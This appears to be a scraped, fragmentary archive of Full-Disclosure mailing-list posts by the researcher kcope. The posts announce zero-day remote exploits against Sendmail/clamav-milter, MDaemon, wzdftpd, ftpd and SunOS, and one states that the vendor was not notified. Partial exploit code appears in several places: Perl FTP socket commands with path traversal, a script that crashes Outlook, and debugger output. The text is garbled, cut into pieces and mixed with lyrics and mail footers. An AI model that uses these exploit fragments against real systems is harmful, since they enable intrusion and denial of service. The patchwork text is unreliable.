##Logsurfer default recommendation / configuration Remote Code Execution /
Injection
##discovered by kcope when securing a box
The Logsurfer program distributed by DFN CERT at
http://www.dfn-cert.de/eng/logsurf/
has a ridicolous remote code execution bug in one of its mailing scripts when
(see attached)
- -kcope
--
GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS.
Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail
/*
SunOS 5.10 Remote ICMP Kernel Crash Exploit by kcope
Null Pointer Dereference in Kernel Space
Seems to work only if attacked
They got into the town, the enemies,
they crushed the doors, the enemies,
and we laughed in the neighborhoods,
in the first day,
They got into the town, the enemies,
they took brothers, the enemies,
and we looked at the ladies,
the next day,
They got into the town, the enemies,
they burned us, the
You don't believe in TESO!
GO EXPLOIT BIND #!+$# AS A PIONEER!
Merry Christmas,
kcdarookie
--
Pt! Schon vom neuen GMX MultiMessenger gehört?
Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger?did=10
___
Full-Disclosure -
well,
clamav-milter prior to 0.91.2 //CVE-2007-4560
### black-hole.pl
### Sendmail w/ clamav-milter Remote Root Exploit
### Copyright (c) 2007 Eliteboy
use IO::Socket;
print Sendmail w/ clamav-milter Remote Root Exploit\n;
print Copyright
/tmp/testXXX
signed,
- -kcope/2007
--
GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS.
Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full
Look this also seems to work on sendmail. Not verified tough.
--
GMX FreeMail: 1 GB Postfach, 5 E-Mail-Adressen, 10 Free SMS.
Alle Infos und kostenlose Anmeldung: http://www.gmx.net/de/go/freemail
___
Full-Disclosure - We believe in it.
Charter:
exploiting features
(see attached)
- -kcope / 2007
--
Pt! Schon vom neuen GMX MultiMessenger gehört?
Der kann`s mit allen: http://www.gmx.net/de/go/multimessenger
#!python
# (C) 2007 kcope production
from ftplib import FTP
import sys
import socket
print Sendmail/Postfix FORWARD Remote
(see attached)
Mikis Theodorakis Grigoris Bithikotsis//Tis Dikaiosynis ilie noite:
http://kypros.org/Occupied_Cyprus/epiktitos/audio/patriotic/THEODORAKIS%20%20BITHIKOTSIS%20-%20Tis%20Dikaiosynis%20Ilie%20Noite.mp3
(see attached)
signed,
eliteb0y/2007
--
Pt! Schon vom neuen GMX
Alla pisteua gia sena,
Alla phantasomouna,
Nomisa pos magapouses,
Kai geliomouna.
Alla pisteua gia sena,
Alla phantasomouna,
Nomisa pos magapouses,
Kai geliomouna.
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf
http://www.com-winner.com/Alla_pisteua.mp3
Hello this is kingcope,
attached is an example exploit
--
Ein Herz für Kinder - Ihre Spende hilft! Aktion: www.deutschlandsegelt.de
Unser Dankeschön: Ihr Name auf dem Segel der 1. deutschen America's Cup-Yacht!
ftpd-ldpreload.pl
Description: Binary data
USER kcope\r\n;
print $sock PASS remoteroot\r\n;
$x = stdin;
print $sock MKD $a\r\n;
print $sock NLST C*/../C*/../C*/../$d\r\n;
print $sock QUIT\r\n;
while ($sock) {
print;
}
---snip---
gdb output tested on NetBSD 3.0 i386 NetBSD-ftpd 20050303 :
(gdb) c
Continuing.
Program received
edit of the xls file.
Best Regards,
kcope
FistFuXXer wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Hello kcope,
the vulnerability that you've found isn't an Unicode-based buffer
overflow, Spreadsheet-Perl just converts the string to Unicode and you
can edit it later with a hex editor
Hello this is kcope,
recently I thought I had discovered a remote preauth vulnerability in
MDaemon latest version (9.0.1/9.0.2).
And it really looked like one in the debugger (OllyDbg) .. so I posted
it to full disclosure.
Afterwards I tried to write an exploit, and yes I succeeded
Hi Solo,
The server is not going to crash, you have to attach a debugger like
ollydbg and see what happens,
it reaches the 4 byte overwrite.
Best regards,
kcope
. Solo schrieb:
Hi,kcope
I test your poc, the server of mdeamon did not crash.
The server send the [RST] to the client to reset
MDAEMON LATEST VERSION PREAUTH *REMOTE ROOT HOLE*
zeroday discovered by kcope kingcope[at]gmx.net !!!
shouts to alex,wY!,bogus,revoguard,adizeone
Description
There's a remotely exploitable preauthentication hole in Alt-N MDaemon.
It is a Heap Overflow in the IMAP Daemon.
It can be triggered
Shouts to blackzero, alex, wY!, revoguard, bogus, wtfomg and all those
yankees
LOVE TO LISA :-)
genuine advisory by kcope/zeroday discovered by kcope!!! kingcope[at]gmx.net
public disclosure 21. May 2006
vendor was not notified (mail quota exceeded) fuck it
let's get to business
: packet_disconnect(constchar*fmt,...)
code: packet_disconnect(msg);
i guess thats not exploitable since msg is not user supplied.
any pointers from the list?
- - kcope
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full
hello this is kcope,
i got juarez for you..
lnxFTPDssl_warez.c is a remote r00t exploit
for the latest version of linux-ftpd-ssl.
have fun and send me feedback to kingcope[at]gmx.net
-kc
/*Oct2005 VER2
lol, yeah you're missing something :-)
just give a try on some real box...
best regards,
kcope
Harry Hoffman wrote:
Umm, am I missing something here? It looks like you need to be root to
run this program?
In the fbsd one you are trying to write to /etc which has perms:
drwxr-xr-x 17 root
hello this is kcope,
here's my simple wzdftpd exploit (0day) attached...
wzdftpdwarez.pl
Description: Perl program
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia
hehelol :-)
imail.pl
Description: Perl program
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Hello this is kcope,
there are two remote vulnerabilities in the latest ALT-N MDaemon imapd
product
i don't know if any of them is exploitable .. the stack based buffer
overflow
seems promising, but it's not preauth so i didn't investigate it further.
1.) Remote denial of service
hello, this is kcope and i´m bored .. soo
sending an email with an attachment named aux to a Microsoft Outlook
client crashes Outlook, can someone confirm that?
here´s some code to test that
-snip--
use Net::SMTP_auth;
$smtp = Net::SMTP_auth-new('mail.gmx.net');
$smtp-auth
24 matches
Mail list logo